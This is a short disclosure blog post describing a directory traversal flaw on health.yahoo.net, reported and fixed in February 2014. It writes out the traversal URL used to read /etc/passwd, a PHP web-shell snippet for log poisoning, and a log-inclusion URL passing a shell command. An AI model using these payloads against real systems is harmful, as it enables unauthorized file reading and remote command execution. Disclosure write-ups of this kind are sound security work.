Health.Yahoo.com Directory Traversal (LFI)

Hello everyone,
I have recently reported a Directory Traversal to Yahoo! that I’d like to share with everyone. As I was roaming around the health.yahoo.com website (which redirects to health.yahoo.net). I came across the following link:

http://health.yahoo.net/helpContent.jsp?src=docProfileFaq.html

Of course, the first thing I did was to just simply remove the html file out of the url and see what I get:

http://health.yahoo.net/helpContent.jsp?src=

and sure enough I was able to see the file directory:

yahoopoc2

I also tried to read the passwd file located in etc:

http://health.yahoo.net/helpContent.jsp?src=../../../../../../../../../../etc/passwd

and I was successful:

YAHOOLFI-EDITED2

According to a good friend of mine, I could and should have done the following to get a Remote Command Execution:

An attacker may be able to inject the following code by sending a get request such as

<? passthru($_GET[command]) ?>

and inject that into the log file to use as a backdoor

http://health.yahoo.net/helpContent.jsp?title=FAQ&src=../../path/to/logs/logfile%00us&command=ls

But I didn’t think about the following, nor to record my PoC due to all the adrenaline I was feeling when I discovered this vulnerability.

Thank you for reading!

Timeline:
2014-02-06 Reported
2014-02-10 Status changed to triaged
2014-02-11 Fixed

Post a comment

You may use the following HTML:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>